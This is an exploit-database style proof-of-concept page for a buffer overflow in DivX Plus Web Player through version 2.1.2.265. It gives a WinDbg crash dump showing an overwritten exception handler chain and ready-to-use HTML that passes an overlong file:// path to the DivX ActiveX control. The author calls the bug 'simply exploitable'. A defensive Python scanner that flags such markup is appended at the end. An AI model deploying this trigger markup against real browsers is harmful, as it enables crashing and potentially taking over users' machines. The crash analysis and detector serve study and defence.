DivX Plus Web Player "file://" Buffer Overflow Vulnerability PoC
Source: Shahriyar.j < at > gmail  Author: Snake  Published: 2011-10-08

# Exploit Title: DivX Plus Web Player "file://" Buffer Overflow Vulnerability PoC ( 0day )
# Date: 10/4/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: DivX Plus Web Player <= 2.1.2.265
# Tested on: XP SP3 , IE6
# CVE : Not Assigned Yet
# Ref : http://dl.packetstormsecurity.net/1109-advisories/sa45550.txt
 
This is a PoC I wrote for our free BA service in 0days.ir.
The bug seems simply exploitable ;)


(ce8.ca8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000007b5 ebx=04634f9e ecx=0000062a edx=0000062b esi=00000041 edi=049ff3ac
eip=03d6c62d esp=049ff35c ebp=00000000 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210216
DivXPlaybackModule+0x3c62d:
03d6c62d 6689344f        mov     word ptr [edi+ecx*2],si  ds:0023:04a00000=5a4d
0:010> dd esp
049ff35c  045e56d4 00000000 03d6c8e3 049ffbfc
049ff36c  045e56d0 04634f9e 001f5980 00000000
049ff37c  001eb9e0 00000000 001c5258 00000008
049ff38c  00150178 ffffffff 7c91003d 001c5260
049ff39c  00150000 001ead30 7c8099fd 00000000
049ff3ac  0046002f 002f003a 00410041 00410041
049ff3bc  00410041 00410041 00410041 00410041
049ff3cc  00410041 00410041 00410041 00410041
0:010> dd
049ff3dc  00410041 00410041 00410041 00410041
049ff3ec  00410041 00410041 00410041 00410041
049ff3fc  00410041 00410041 00410041 00410041
049ff40c  00410041 00410041 00410041 00410041
049ff41c  00410041 00410041 00410041 00410041
049ff42c  00410041 00410041 00410041 00410041
049ff43c  00410041 00410041 00410041 00410041
049ff44c  00410041 00410041 00410041 00410041
0:010> !exchain
049ffd9c: iexplore!DllGetLCID+dca7 (00410041)
Invalid exception stack at 00410041

Also check here for free Persian BA:
http://www.0days.ir/article/

-have fun
twitter.com/ponez

<object classid="clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616" width="500" height="245" codebase="http://go.divx.com/plugin/DivXBrowserPlugin.cab">
  <param name="custommode" value="none" />
  <param name="previewImage" value="Test" />
  <param name="autoPlay" value="true" />
  <param name="src" value="file:///F:/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA.mkv" />
<embed type="video/divx" src="file:///F:/.mkv" custommode="none" width="500" height="245" autoPlay="true" previewImage="Test" pluginspage="http://go.divx.com/plugin/download/">
</embed>
</object>
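
For detection, the markup above has a recognisable shape: the DivX control (by classid or by the video/divx embed type) is handed a file:// source far longer than any real path. The Python check below is an added example, not part of the original advisory or of any DivX tooling; the 260-character limit (Windows MAX_PATH) and the sample strings are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

DIVX_CLSID = "clsid:67dabfbf-d0ab-41fa-9c46-cc0f21721616"  # classid used on this page
DIVX_MIME = "video/divx"                                   # embed type used on this page
MAX_URL_LEN = 260  # assumption: Windows MAX_PATH as the upper bound for a sane path


class DivXSrcScanner(HTMLParser):
    """Records overlong file:// sources passed to the DivX web player."""

    def __init__(self):
        super().__init__()
        self.objects = []    # one bool per open <object>: is it the DivX control?
        self.findings = []   # (tag, url_length) for each suspicious source

    def _check(self, tag, url):
        url = (url or "").strip()
        if url.lower().startswith("file:") and len(url) > MAX_URL_LEN:
            self.findings.append((tag, len(url)))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            self.objects.append(a.get("classid", "").lower() == DIVX_CLSID)
        elif tag == "param" and any(self.objects) and a.get("name", "").lower() == "src":
            self._check("param", a.get("value"))
        elif tag == "embed" and a.get("type", "").lower() == DIVX_MIME:
            self._check("embed", a.get("src"))

    def handle_endtag(self, tag):
        if tag == "object" and self.objects:
            self.objects.pop()


def scan(html):
    """Return the list of (tag, length) findings for one HTML document."""
    scanner = DivXSrcScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples (not captured traffic): same markup shape, different lengths.
SAMPLE_OK = ('<object classid="clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616">'
             '<param name="src" value="file:///C:/clip.mkv" />'
             '<embed type="video/divx" src="file:///C:/clip.mkv"></embed></object>')
SAMPLE_LONG = SAMPLE_OK.replace("clip", "x" * 2000, 1)

if __name__ == "__main__":
    print(scan(SAMPLE_OK), scan(SAMPLE_LONG))
```

The same rule can run in a web proxy or mail gateway content filter; hosts still on DivX Plus Web Player 2.1.2.265 or earlier are the ones that need it.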


 